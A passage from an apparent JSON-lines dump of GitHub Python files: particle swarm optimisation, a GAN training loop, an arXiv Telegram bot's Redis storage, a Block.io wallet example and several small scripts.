self.update_delta_t()\r\n if self.complete() and not suppress_output:\r\n print(\"Points:\")\r\n print(self.Gb)\r\n print(\"Iterations:\")\r\n print(self.iter)\r\n print(\"Flist:\")\r\n print(self.F_Gb)\r\n print(\"Norm Flist:\")\r\n print(np.linalg.norm(self.F_Gb))\r\n\r\n def export_swarm(self):\r\n swarm_export = {'lbound': self.lbound,\r\n 'ubound': self.ubound,\r\n 'M': self.M,\r\n 'V': self.V,\r\n 'Gb': self.Gb,\r\n 'F_Gb': self.F_Gb,\r\n 'Pb': self.Pb,\r\n 'F_Pb': self.F_Pb,\r\n 'weights': self.weights,\r\n 'targets': self.targets,\r\n 'T_MOD': self.T_MOD,\r\n 'maxit': self.maxit,\r\n 'E_TOL': self.E_TOL,\r\n 'iter': self.iter,\r\n 'delta_t': self.delta_t,\r\n 'current_particle': self.current_particle,\r\n 'number_of_particles': self.number_of_particles,\r\n 'allow_update': self.allow_update,\r\n 'Flist': self.Flist,\r\n 'Fvals': self.Fvals}\r\n \r\n return swarm_export\r\n\r\n def import_swarm(self, swarm_export, obj_func):\r\n self.lbound = swarm_export['lbound'] \r\n self.ubound = swarm_export['ubound'] \r\n self.M = swarm_export['M'] \r\n self.V = swarm_export['V'] \r\n self.Gb = swarm_export['Gb'] \r\n self.F_Gb = swarm_export['F_Gb'] \r\n self.Pb = swarm_export['Pb'] \r\n self.F_Pb = swarm_export['F_Pb'] \r\n self.weights = swarm_export['weights'] \r\n self.targets = swarm_export['targets'] \r\n self.T_MOD = swarm_export['T_MOD'] \r\n self.maxit = swarm_export['maxit'] \r\n self.E_TOL = swarm_export['E_TOL'] \r\n self.iter = swarm_export['iter'] \r\n self.delta_t = swarm_export['delta_t'] \r\n self.current_particle = swarm_export['current_particle'] \r\n self.number_of_particles = swarm_export['number_of_particles'] \r\n self.allow_update = swarm_export['allow_update'] \r\n self.Flist = swarm_export['Flist'] \r\n self.Fvals = swarm_export['Fvals']\r\n self.obj_func = obj_func \r\n\r\n \r\n\r\n ","repo_name":"jonathan46000/pso_python","sub_path":"particle_swarm.py","file_name":"particle_swarm.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44737087557","text":"from setuptools import setup, find_packages\n\ninstall_requires = [\n 'python-dateutil>=2.4.2,<3.0.0',\n 'PyGithub>=1.26.0,<2.0.0',\n]\n\nsetup(\n name='lgtm',\n version='0.0.14',\n packages=find_packages(exclude=['tests', 'lgtm/tests']),\n install_requires=install_requires,\n include_package_data=True,\n author='Chase Seibert',\n author_email='cseibert@nerdwallet.com',\n license='Other/Proprietary License',\n description='A pull request approval system using GitHub protected branches and OWNERS files.',\n long_description='',\n url='https://github.com/nerdwallet/github-lgtm',\n entry_points={\n 'console_scripts': ['lgtm=lgtm.console:main'],\n },\n)\n","repo_name":"NerdWalletOSS/github-lgtm","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"21415691456","text":"import torch\nfrom utils import save_checkpoint, load_checkpoint, Plotter\nimport torch.nn as nn\nimport torch.optim as optim\nfrom generator import Generator\nfrom discriminator import Discriminator\nfrom torch.utils.data import DataLoader\nfrom torchmetrics import Accuracy\nfrom tqdm import tqdm\nimport torchvision\nfrom dataset import ImageDataset\n\nDATASET = \"maps\"\n\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nTRAIN_DIR = f\"data/{DATASET}/train\"\nVAL_DIR = f\"data/{DATASET}/val\"\nLEARNING_RATE = 2e-4\nBATCH_SIZE = 16\nNUM_WORKERS = 2\nIMAGE_SIZE = 256\nCHANNELS_IMG = 3\nL1_LAMBDA = 100\nLAMBDA_GP = 10\nNUM_EPOCHS = 200\nLOAD_MODEL = False\nSAVE_MODEL = False\nCHECKPOINT_DISC = \"disc.pth.tar\"\nCHECKPOINT_GEN = \"gen.pth.tar\"\n\naccuracy = Accuracy(task=\"binary\").to(DEVICE)\n\ndef train_fn(epoch, loader, dis, gen, opt_dis, opt_gen, loss_fn_1, loss_fn_2):\n loop = tqdm(loader)\n train_loss, train_acc = 0, 0\n gen.train(), dis.train()\n for batch_idx, (data, targets) in enumerate(loop):\n data = data.to(device=DEVICE)\n targets = targets.to(device=DEVICE) \n # train discriminator\n gen_fake = gen(data)\n dis_real = dis(data, targets)\n dis_fake = dis(data, gen_fake.detach())\n dis_real_loss = loss_fn_1(dis_real, torch.ones_like(dis_real))\n dis_fake_loss = loss_fn_1(dis_fake, torch.zeros_like(dis_fake))\n loss_dis = (dis_real_loss + dis_fake_loss) / 2\n opt_dis.zero_grad()\n loss_dis.backward()\n opt_dis.step()\n\n # train generator\n dis_fake = dis(data, gen_fake)\n loss_gen = loss_fn_1(dis_fake, torch.ones_like(dis_fake))\n loss_l1 = loss_fn_2(gen_fake, targets) * L1_LAMBDA\n loss_gen += loss_l1\n opt_gen.zero_grad()\n loss_gen.backward()\n opt_gen.step()\n train_loss += (loss_dis.item() + loss_gen.item())/2\n return train_loss / len(loader)\n\n\ndef valid_fn(epoch, loader, gen, loss_fn, folder=f\"data/{DATASET}/saved_images/\"):\n #get the length of the dataset loader\n loop = tqdm(loader)\n val_loss, val_acc = 0, 0\n gen.eval()\n with torch.inference_mode():\n for batch_idx, (data, targets) in enumerate(loop):\n data = data.to(device=DEVICE)\n targets = targets.to(device=DEVICE) \n # forward\n predictions = gen(data)\n loss = loss_fn(predictions, targets)\n predictions = predictions * 0.5 + 0.5 # remove normalization\n val_loss += loss.item()\n if batch_idx % int(len(loader)/10) == 0:\n torchvision.utils.save_image(predictions, folder + f\"/{str(epoch).zfill(3)}.{batch_idx}_gen.png\")\n torchvision.utils.save_image(data * 0.5 + 0.5, folder + f\"/{str(epoch).zfill(3)}.{batch_idx}_0in.png\")\n loop.set_postfix(loss=loss.item())\n return val_loss / len(loader)\n\ndef main():\n dis = Discriminator(in_channels=CHANNELS_IMG).to(DEVICE)\n gen = Generator(in_channels=CHANNELS_IMG).to(DEVICE)\n opt_dis = optim.Adam(dis.parameters(), lr=LEARNING_RATE, betas=(0.5, 0.999))\n opt_gen = optim.Adam(gen.parameters(), lr=LEARNING_RATE, betas=(0.5, 0.999))\n criterion_1 = nn.BCEWithLogitsLoss()\n criterion_2 = nn.L1Loss()\n\n if LOAD_MODEL:\n load_checkpoint(torch.load(\"my_checkpoint.pth.tar\"), gen, opt_gen, DEVICE)\n load_checkpoint(torch.load(\"my_checkpoint.pth.tar\"), dis, opt_dis, DEVICE)\n \n train_dataset = ImageDataset(root_dir=TRAIN_DIR)\n val_dataset = ImageDataset(root_dir=VAL_DIR)\n train_loader = DataLoader(train_dataset, batch_size=BATCH_SIZE, shuffle=True, num_workers=NUM_WORKERS)\n val_loader = DataLoader(val_dataset, batch_size=1, shuffle=False, num_workers=NUM_WORKERS)\n\n plotter = Plotter()\n\n for epoch in range(NUM_EPOCHS):\n train_loss = train_fn(epoch, train_loader, dis, gen, opt_dis, opt_gen, criterion_1, criterion_2)\n if SAVE_MODEL:\n checkpoint = {\n \"state_dict\": gen.state_dict(),\n \"optimizer\": opt_gen.state_dict(),\n }\n save_checkpoint(checkpoint, filename=CHECKPOINT_GEN)\n checkpoint = {\n \"state_dict\": dis.state_dict(),\n \"optimizer\": opt_dis.state_dict(),\n }\n save_checkpoint(checkpoint, filename=CHECKPOINT_DISC)\n test_loss = valid_fn(epoch, val_loader, gen, criterion_1)\n print(f\"Epoch: {epoch} || Train Loss: {train_loss:.4f} || Test Loss: {test_loss:.4f}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bresilla/papers_with_code","sub_path":"pix2pix/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13681150602","text":"import pyfiglet\nfrom param_tennis import Param\nfrom main.train import Train\nimport argparse\n\ndef gridsearch(csv):\n props = {'learning_rate': 1e-6, 'epochs': 100, 'batch_size': 32, 'optimizer': 'adam',\n 'momentum': 0.9, 'nesterov': True}\n batch_sizes = [32, 128, 256, 512]\n lrs = [1e-5, 1e-6]\n optimizers = ['sgd', 'adam', 'adamw']\n for optimizer in optimizers:\n for lr in lrs:\n for batch_size in batch_sizes:\n props['learning_rate'] = lr\n props['batch_size'] = batch_size\n props['optimizer'] = optimizer\n p = Param(props)\n Tr = Train(csv, p)\n Tr.train()\n\n\nif __name__ == '__main__':\n result = pyfiglet.figlet_format(\"Tennis Gridsearch Training\", font=\"slant\")\n csv = r'D:\\Data\\Sports\\tennis\\tennis_data\\atp_database.csv'\n parser = argparse.ArgumentParser()\n parser.add_argument('--csv', default=csv, help='CSV Data for gridsearch. ')\n args = parser.parse_args()\n print(args)\n gridsearch(args.csv)\n","repo_name":"jdlamstein/tennispredictor","sub_path":"main/gridsearch.py","file_name":"gridsearch.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39904214722","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nArxiv Telegram Bot - Redis Instance\n\nContains all methods related to storing and fetching user data using redis instance\n\"\"\"\n\nimport arxiv\nimport datetime\nimport pytz\nimport re\nimport redis\nimport pickle\nimport os\nimport dotenv\nfrom urllib.parse import urlparse\nimport logging\n\nfrom telegram.ext import CallbackContext\n\ndotenv.load_dotenv()\nurl = urlparse(os.environ.get(\"REDIS_URL\"))\nr = redis.StrictRedis(\n host=url.hostname,\n port=url.port,\n username=\"\",\n password=os.environ.get(\"REDIS_PASSWORD\"),\n)\n\n\ndef add_user(chat_id):\n \"\"\"store user chat id\"\"\"\n if r.get(\"Users\"):\n users = pickle.loads(r.get(\"Users\"))\n users.add(chat_id)\n r.set(\"Users\", pickle.dumps(users))\n else:\n users = set([chat_id])\n r.set(\"Users\", pickle.dumps(users))\n\n\ndef get_users():\n \"\"\"get stored user chat ids\"\"\"\n if r.get(\"Users\"):\n return pickle.loads(r.get(\"Users\"))\n else:\n return set([])\n\n\ndef add_user_preferences(chat_id, category, response):\n \"\"\"store/cache chat_id and user_preferences\"\"\"\n if r.get(chat_id):\n catalogue = pickle.loads(r.get(chat_id))\n if catalogue.get(category):\n catalogue[category].add(response)\n else:\n catalogue[category] = set([response])\n r.set(chat_id, pickle.dumps(catalogue))\n else:\n catalogue = {category: set([response])}\n r.set(chat_id, pickle.dumps(catalogue))\n\n return \"User Added\"\n\n\ndef remove_user_preferences(chat_id, category, response):\n \"\"\"remove chat_id and user_preferences\"\"\"\n catalogue = pickle.loads(r.get(chat_id))\n catalogue[category].remove(response)\n if catalogue[category]:\n r.set(chat_id, pickle.dumps(catalogue))\n else:\n del catalogue[category]\n if catalogue:\n r.set(chat_id, pickle.dumps(catalogue))\n else:\n r.delete(chat_id)\n return \"Topic Removed\"\n\n\ndef get_user_preferences(chat_id, context: CallbackContext):\n \"\"\"store/cache chat_id and user_preferences\"\"\"\n if r.get(chat_id):\n catalogue = pickle.loads(r.get(chat_id))\n context.user_data[\"CURRENT_PREFERENCES\"] = catalogue\n return context.user_data[\"CURRENT_PREFERENCES\"]\n return []\n\n\ndef store_update_time():\n r.set(\"Time\", pickle.dumps(datetime.datetime.now()))\n\n\ndef get_update_time():\n if r.get(\"Time\"):\n return pickle.loads(r.get(\"Time\"))\n\n\ndef store_paper_update(category, topics):\n \"\"\"store latest papers for each category\"\"\"\n Category = {}\n for topic in topics.items():\n search = arxiv.Search(\n query=topic[1],\n max_results=1,\n sort_by=arxiv.SortCriterion.SubmittedDate,\n sort_order=arxiv.SortOrder.Descending,\n )\n\n result = search.results().__next__()\n setTime = datetime.datetime.now()\n setTime = setTime.replace(tzinfo=pytz.utc)\n setTime = setTime - datetime.timedelta(hours=12)\n if result.published > setTime:\n paper_dict = {}\n\n title = format_content(result.title)\n paper_dict[\"title\"] = title\n\n date = format_content(str(result.published).split()[0])\n paper_dict[\"date\"] = date\n\n summary = format_content(result.summary)\n summary = summary.replace(\"\\n\", \" \")\n paper_dict[\"summary\"] = summary\n\n categories = format_content(\", \".join(result.categories))\n paper_dict[\"categories\"] = categories\n\n abs_url = [str(link) for link in result.links if \"abs\" in str(link)][0]\n abs_url = format_content(re.sub(r\"v\\d+\\b\", \"\", abs_url))\n paper_dict[\"abs_url\"] = abs_url\n\n pdf_url = [str(link) for link in result.links if \"pdf\" in str(link)][0]\n pdf_url = format_content(re.sub(r\"v\\d+\\b\", \"\", pdf_url))\n paper_dict[\"pdf_url\"] = pdf_url\n\n try:\n Category = pickle.loads(r.get(category))\n Category[topic[1]] = paper_dict\n # Only supports one paper right now\n r.set(category, pickle.dumps(Category))\n except:\n r.delete(category)\n Category[topic[1]] = paper_dict\n # Only supports one paper right now\n r.set(category, pickle.dumps(Category))\n\n\ndef get_stored_paper(category, topicCode):\n if r.get(category):\n category = pickle.loads(r.get(category))\n if topicCode in category:\n return category[topicCode]\n else:\n return None\n\n\ndef format_content(content):\n escaper = re.compile(r\"(\\W)\")\n return escaper.sub(r\"\\\\\\1\", content)\n\n\nif __name__ == \"__main__\":\n print(add_user_preferences({}))\n print(get_user_preferences({}))\n print(remove_user_preferences({}))\n print(get_stored_paper({}))\n","repo_name":"sonaalPradeep/arxiv-telegram-bot","sub_path":"arxiv_telegram_bot/functions/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8611092466","text":"# Basic example for using Block.io for generating wallet addresses and withdrawing coins\n\nfrom block_io import BlockIo\nfrom decimal import *\nimport os\nimport random\nimport sys\nimport json\n\nversion = 2 # API version\n\n# use a testnet api key here, say, dogecoin\nblock_io = BlockIo(os.environ.get('BLOCK_IO_API_KEY'), os.environ.get('BLOCK_IO_PIN'), version)\n\n# create a new address with a random label\naddress_label = 'tlabel'+str(int(random.random()*10000))\n\nnew_address = None\n\ntry:\n new_address = block_io.get_new_address(label=address_label)['data']['address']\nexcept Exception:\n exc = sys.exc_info()[1]\n print(exc)\n\nif (new_address is None):\n # the address label already existed, let's get the associated address\n new_address = block_io.get_address_by_label(label=address_label)['data']['address']\n\nprint(\"Address Generated for Label=\",address_label,\":\",new_address)\n\n# get address balance\navailable_balance = Decimal('0.0')\ntry:\n response = block_io.get_address_balance(label=address_label)\n available_balance = Decimal(response['data']['available_balance'])\n network = response['data']['network']\n print(\"Available Balance in Label=\",address_label,\":\",format(available_balance,'.8f'),network)\nexcept Exception:\n exc = sys.exc_info()[1]\n print(exc)\n\n# get total balance on the account\ntry:\n response = block_io.get_balance()\n available_balance = Decimal(response['data']['available_balance'])\n network = response['data']['network']\n print(\"Total Balance in Account=\",format(available_balance,'.8f'),network)\nexcept Exception:\n exc = sys.exc_info()[1]\n print(exc)\n\n# send 1% of the coins in our account to our new label's address\ntry:\n amount_to_send = Decimal(0.01) * available_balance\n print(\"Sending Coins=\",format(amount_to_send,'.8f'),\"to Label=\",address_label)\n\n # prepare the transaction\n prepared_transaction = block_io.prepare_transaction(to_label=address_label, amount=format(amount_to_send, '.8f'))\n\n # review its response\n # for in-depth information about the transaction you will create, look at the prepared_transaction object directly\n print(json.dumps(block_io.summarize_prepared_transaction(prepared_transaction)))\n\n # once satisfied, create the transaction and sign it\n created_transaction_and_signatures = block_io.create_and_sign_transaction(prepared_transaction)\n\n # inspect the transaction_data (particularly the tx_hex) to ensure it is what you wanted\n # once satisfied, submit the transaction to Block.io for its signature + broadcast to the peer-to-peer network\n response = block_io.submit_transaction(transaction_data=created_transaction_and_signatures)\n \n print(\"Coins sent. Transaction ID=\", response['data']['txid'])\nexcept Exception:\n exc = sys.exc_info()[1]\n print(exc)\n\n# get the new balance on our new address\ntry:\n response = block_io.get_address_balance(label=address_label)\n available_balance = Decimal(response['data']['available_balance'])\n network = response['data']['network']\n \n print(\"New Balance in Label=\",address_label+\":\",format(available_balance,'.8f'),network)\nexcept Exception:\n exc = sys.exc_info()[1]\n print(exc)\n\n# end :)\n","repo_name":"BlockIo/block_io-python","sub_path":"examples/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"61"} +{"seq_id":"23429508911","text":"file = open('B-large.in', mode = 'r')\noutfile = open('output.out', mode = 'w')\nn = int(file.readline()[:-1])\nresult = []\nfor k in range(n):\n data = file.readline()[:-1].split(' ')\n c = float(data[0])\n f = float(data[1])\n x = float(data[2])\n i = 0\n s = 0\n cur = x/2\n prev = x\n while cur < prev:\n s = s + c/(2+i*f)\n prev = cur\n cur = s + x/(2+(i+1)*f)\n i += 1\n result.append(prev)\n\nfor i in range(n):\n outfile.write('Case #'+str(i+1)+': '+str(result[i])+'\\n')\n\nfile.close()\noutfile.close()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/765.py","file_name":"765.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3610253284","text":"from random import random\nimport numpy as np\n\nimport tensorflow as tf\nfrom keras.utils import to_categorical\n\nimport json, time\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom utils import *\nfrom data_gen import *\nfrom model2 import *\n\ntf.logging.set_verbosity(tf.logging.INFO)\nFLAGS = tf.app.flags.FLAGS\n\n\n\ndef evaluate_model(sess, model, data_set):\n \"\"\"Returns the average weighted cost, reconstruction cost and KL cost.\"\"\"\n total_cost = 0.0\n total_pd = 0.0\n total_ps = 0.0\n for batch in range(data_set.num_batches):\n\n unused_orig_x, x, s,index_chars = data_set.random_batch()\n\n feed = {model.input_data: x,\n model.sequence_lengths: s,\n model.index_chars: index_chars,\n model.initial_state: np.zeros([args.max_seq_len, args.out_dim + args.hidden_size]),\n }\n\n\n [cost,pd,ps] = sess.run([model.cost,model.Pd, model.Ps], feed)\n total_cost += cost\n total_pd += pd\n total_ps += ps\n \n \n total_pd /= (data_set.num_batches)\n total_ps /= (data_set.num_batches)\n total_cost /= (data_set.num_batches)\n\n print('Pd: ' + str(total_pd))\n print('Ps: ' + str(total_ps))\n\n \n return total_cost\n\ndef train(sess, model, eval_model, train_set, valid_set, test_set,args):\n summary_writer = tf.summary.FileWriter(FLAGS.log_root)\n\n # Calculate trainable params.\n t_vars = tf.trainable_variables()\n count_t_vars = 0\n for var in t_vars:\n num_param = np.prod(var.get_shape().as_list())\n count_t_vars += num_param\n tf.logging.info('%s %s %i', var.name, str(var.get_shape()), num_param)\n tf.logging.info('Total trainable variables %i.', count_t_vars)\n model_summ = tf.summary.Summary()\n model_summ.value.add(\n tag='Num_Trainable_Params', simple_value=float(count_t_vars))\n summary_writer.add_summary(model_summ, 0)\n summary_writer.flush()\n\n # setup eval stats\n best_valid_cost = 10000000000000.0 # set a large init value\n valid_cost = 0.0\n\n # main train loop\n embedding_init = sess.run(model.embedding_matrix, feed_dict={})\n\n start = time.time()\n\n #train_writer = tf.summary.FileWriter('logs', sess.graph)\n\n for _ in range(args.num_epochs):\n\n step = sess.run(model.global_step)\n\n #merge = tf.summary.merge_all()\n\n curr_learning_rate = ((args.learning_rate - args.min_learning_rate) *\n (args.decay_rate) ** step + args.min_learning_rate)\n\n _, x, s, index_chars = train_set.random_batch()\n\n feed = {\n model.input_data: x,\n model.sequence_lengths: s,\n model.lr: curr_learning_rate,\n\n model.initial_state: np.zeros([args.max_seq_len, args.out_dim+args.hidden_size]),\n model.index_chars: index_chars\n\n }\n\n (train_cost, _, train_step, _, pd, ps) = sess.run([model.cost, model.final_state, \n model.global_step, model.train_op, \n model.Pd, model.Ps], feed)\n\n #train_writer.add_summary(summary, step)\n\n if step % (args.save_every/2) == 0 and step > 0:\n\n embedding_after = sess.run(model.embedding_matrix, feed_dict={})\n print('Change in embedding matrix: ' + str(np.sum(abs(embedding_after - embedding_init))))\n\n end = time.time()\n time_taken = end - start\n\n cost_summ = tf.summary.Summary()\n cost_summ.value.add(tag='Train_Cost', simple_value=float(train_cost))\n lr_summ = tf.summary.Summary()\n lr_summ.value.add(\n tag='Learning_Rate', simple_value=float(curr_learning_rate))\n time_summ = tf.summary.Summary()\n time_summ.value.add(\n tag='Time_Taken_Train', simple_value=float(time_taken))\n\n output_format = ('step: %d, lr: %.6f, cost: %.4f, '\n 'train_time_taken: %.4f')\n output_values = (step, curr_learning_rate, train_cost,\n time_taken)\n output_log = output_format % output_values\n\n tf.logging.info(output_log)\n\n summary_writer.add_summary(cost_summ, train_step)\n summary_writer.add_summary(lr_summ, train_step)\n summary_writer.add_summary(time_summ, train_step)\n summary_writer.flush()\n start = time.time()\n\n if step % args.save_every == 0 and step > 0:\n\n (valid_cost) = evaluate_model(sess, eval_model, valid_set)\n\n end = time.time()\n time_taken_valid = end - start\n start = time.time()\n\n valid_cost_summ = tf.summary.Summary()\n valid_cost_summ.value.add(\n tag='Valid_Cost', simple_value=float(valid_cost))\n\n valid_time_summ = tf.summary.Summary()\n valid_time_summ.value.add(\n tag='Time_Taken_Valid', simple_value=float(time_taken_valid))\n\n output_format = ('best_valid_cost: %0.4f, valid_cost: %.4f, '\n ' valid_time_taken: %.4f')\n output_values = (min(best_valid_cost, valid_cost), valid_cost,\n time_taken_valid)\n output_log = output_format % output_values\n\n tf.logging.info(output_log)\n\n summary_writer.add_summary(valid_cost_summ, train_step)\n summary_writer.add_summary(valid_time_summ, train_step)\n summary_writer.flush()\n\n if valid_cost < best_valid_cost:\n best_valid_cost = valid_cost\n\n save_model(sess, args.model_dir, step)\n\n end = time.time()\n time_taken_save = end - start\n start = time.time()\n\n tf.logging.info('time_taken_save %4.4f.', time_taken_save)\n\n best_valid_cost_summ = tf.summary.Summary()\n best_valid_cost_summ.value.add(\n tag='Best_Valid_Cost', simple_value=float(best_valid_cost))\n\n summary_writer.add_summary(best_valid_cost_summ, train_step)\n summary_writer.flush()\n\n (eval_cost) = evaluate_model(sess, eval_model, test_set)\n\n end = time.time()\n time_taken_eval = end - start\n start = time.time()\n\n eval_cost_summ = tf.summary.Summary()\n eval_cost_summ.value.add(tag='Eval_Cost', simple_value=float(eval_cost))\n eval_time_summ = tf.summary.Summary()\n eval_time_summ.value.add(\n tag='Time_Taken_Eval', simple_value=float(time_taken_eval))\n\n output_format = ('eval_cost: %.4f, '\n 'eval_time_taken: %.4f')\n output_values = (eval_cost, time_taken_eval)\n output_log = output_format % output_values\n\n tf.logging.info(output_log)\n\n summary_writer.add_summary(eval_cost_summ, train_step)\n summary_writer.add_summary(eval_time_summ, train_step)\n summary_writer.flush()\n\ndef trainer(args):\n\n # load data\n stroke_train, stroke_val, label_train, label_val, label2char, char2label, max_len,_,_ = load_data(args.data_dir, args.model_dir)\n vocabulary = len(label2char)\n\n train_set = DataLoader(stroke_train, label_train, batch_size=args.batch_size, max_seq_length=args.max_seq_len, embedding_len = args.embedding_len, vocabulary = vocabulary)\n valid_set = DataLoader(stroke_val, label_val, batch_size=args.batch_size, max_seq_length=args.max_seq_len, embedding_len = args.embedding_len, vocabulary = vocabulary)\n test_set = valid_set\n\n reset_graph()\n # load model\n model = Generation_model(args=args,vocabulary=vocabulary)\n eval_model = Generation_model(args=args, reuse=True, vocabulary=vocabulary)\n\n # start session\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n\n # check if resume model\n if args.is_resume:\n load_checkpoint(sess,FLAGS.log_root)\n\n train(sess, model, eval_model, train_set, valid_set, test_set, args)\n\ndef generate(args):\n # load data\n stroke_train, stroke_val, label_train, label_val, label2char, char2label, max_len, all_strokes, all_lbls = load_data(args.data_dir,\n args.model_dir)\n vocabulary = len(label2char)\n\n test_set = DataLoader(stroke_val, label_val, batch_size=args.batch_size,\n max_seq_length=args.max_seq_len, embedding_len=args.embedding_len,\n vocabulary=vocabulary)\n\n train_set = DataLoader(stroke_train, label_train, batch_size=args.batch_size,\n max_seq_length=args.max_seq_len, embedding_len=args.embedding_len,\n vocabulary=vocabulary)\n\n data_set = DataLoader(all_strokes, all_lbls, batch_size=args.batch_size,\n max_seq_length=args.max_seq_len, embedding_len=args.embedding_len,\n vocabulary=vocabulary)\n # construct the sketch-rnn model here:\n reset_graph()\n\n model = Generation_model(args=args, vocabulary=vocabulary)\n args.is_training = False\n args.batch_size = 1\n sample_model = Generation_model(args=args, reuse=True, vocabulary=vocabulary)\n\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n\n # print(\n #\n # \"The embedding matrix: \" + sess.run(model.embedding_matrix, feed_dict={})\n #\n # )\n\n # loads the weights from checkpoint into our model\n load_checkpoint(sess, FLAGS.log_root)\n\n index = random.randint(0,len(train_set.charlabel))\n index_char = train_set.charlabel[index]\n x = train_set.strokes[index]\n label = label2char[index_char][0]\n\n print(label)\n\n sample_strokes, m = sample(sess, sample_model, seq_len=args.max_seq_len, temperature=0.9, index_char = index_char, args=args)\n\n sample_strokes[:, 2] = sample_strokes[:, 3] # change because we don't input the sequence, so we don't change at the to_big_stroke\n\n strokes = to_normal_strokes(sample_strokes)\n x_strokes = to_normal_strokes(x)\n\n draw_strokes(x_strokes, svg_fpath='sample/origin_' + label + '.svg')\n draw_strokes(strokes, svg_fpath='sample/gen_' + label + '.svg')\n\n\n # line_rebuild = strokes52lines(x)\n\n # l=0\n # for i in range(len(x[0])):\n # if x[0][i, 2] > 0:\n # l += 1\n #\n #\n # plot_char(args.sample_dir,lines2pts(line_rebuild)[0][1:l], label2char.get(index_char[0],None)[0])\n #\n # # draw_strokes(to_normal_strokes(x[0]), svg_fpath='sample/origin_' + label2char.get(index_char[0],None)[0] + '.svg')\n # # 0: ve 1: nhac len\n # # for i in range(len(q)):\n # # char = label2char.get(index_char[i], None)\n # # draw_strokes(to_normal_strokes(q[i]),svg_fpath='sample/origin_'+ char[0] + '.svg')\n #\n # sample_strokes, m = sample(sess, sample_model, seq_len=args.max_seq_len, index_char = index_char[0], args = args)\n #\n #\n # l=0\n # for i in range(len(sample_strokes)):\n # if sample_strokes[i, 2] > 0:\n # l += 1\n # if l == len(sample_strokes):\n # l=0\n #\n # line_rebuild_gen = strokes52lines([sample_strokes])\n # plot_char(args.sample_dir,lines2pts(line_rebuild_gen)[0][1:l+1], label2char.get(index_char[0],None)[0])\n # print(sample_strokes)\n #strokes = to_normal_strokes(sample_strokes)\n\n #draw_strokes(strokes)\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n\n # environment\n server = True\n\n if server == True:\n parser.add_argument('--data_dir', default='/mnt/DATA/lupin/Flaxscanner/Dataset/Drawing/')\n parser.add_argument('--sample_dir', default='sample/')\n parser.add_argument('--model_dir', default='/mnt/DATA/lupin/Flaxscanner/Models/Drawing/gen_model2/')\n else:\n parser.add_argument('--data_dir', default='/home/lupin/Cinnamon/Flaxscanner/Dataset/Drawing/')\n parser.add_argument('--sample_dir', default='sample/')\n parser.add_argument('--model_dir', default='/home/lupin/Cinnamon/Flaxscanner/Models/Drawing/gen_model2/')\n\n parser.add_argument('--mode', default='train', type=str)\n parser.add_argument('--num_epochs', default= 3000000, type=int)\n\n parser.add_argument('--hidden_size', default=3000, type=int)\n parser.add_argument('--learning_rate', default=1e-4, type=float)\n parser.add_argument('--min_learning_rate', default=1e-6, type=float)\n\n parser.add_argument('--grad_clip', default=1.0, type=int)\n parser.add_argument('--decay_rate', default=0.9999, type=int)\n parser.add_argument('--dropout_rate', default=0.2, type=float)\n parser.add_argument('--max_seq_len', default=60, type=int)\n parser.add_argument('--pen_dim', default=500, type=int)\n parser.add_argument('--out_dim', default=1000, type=int)\n parser.add_argument('--num_mixture', default=50, type=int)\n parser.add_argument('--embedding_len', default=70, type=int)\n parser.add_argument('--batch_size', default=64, type=int)\n parser.add_argument('--is_training', default=True, type=bool)\n parser.add_argument('--save_every', default=200, type=int)\n parser.add_argument('--num_gpu', default='3', type=int)\n parser.add_argument('--is_resume', default=False, type=bool)\n\n args = parser.parse_args()\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.num_gpu)\n\n tf.app.flags.DEFINE_string(\n 'log_root', args.model_dir,\n 'Directory to store model checkpoints, tensorboard.')\n\n if args.mode == 'train':\n trainer(args)\n\n else:\n generate(args)","repo_name":"vankhoa21991/Drawing","sub_path":"gen_model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"7765829905","text":"#Type casting\nfloat1 = 10.5\nint1 = int(float1)\nprint(int1)\nfloat2 = float(int1)\nprint(float2) #Guess what?\n\ntuple1 = (1,2,3)\nlist1 = list(tuple1) #Type casting to List\nprint(list1)\ntuple2 = tuple(list1)\nprint(tuple2) \n","repo_name":"sankethv/DSDec2018","sub_path":"12.TypeCasting.py","file_name":"12.TypeCasting.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9338952668","text":"import os\nimport subprocess\n\nfrom .. import g\n\n\ndef run_process(args):\n # Echo the command we're about the run\n g.log.debug('> %s' % (args if isinstance(args, str) else ' '.join(args)))\n\n # Prepare the subprocess args, piping STDOUT and STDERR so we can capture output.\n # If running on Windows, suppress the console window that would ordinarily be spawned when running a pyinstaller-built EXE.\n kwargs = {'stdout': subprocess.PIPE, 'stderr': subprocess.STDOUT}\n if hasattr(subprocess, 'STARTUPINFO'):\n kwargs['startupinfo'] = 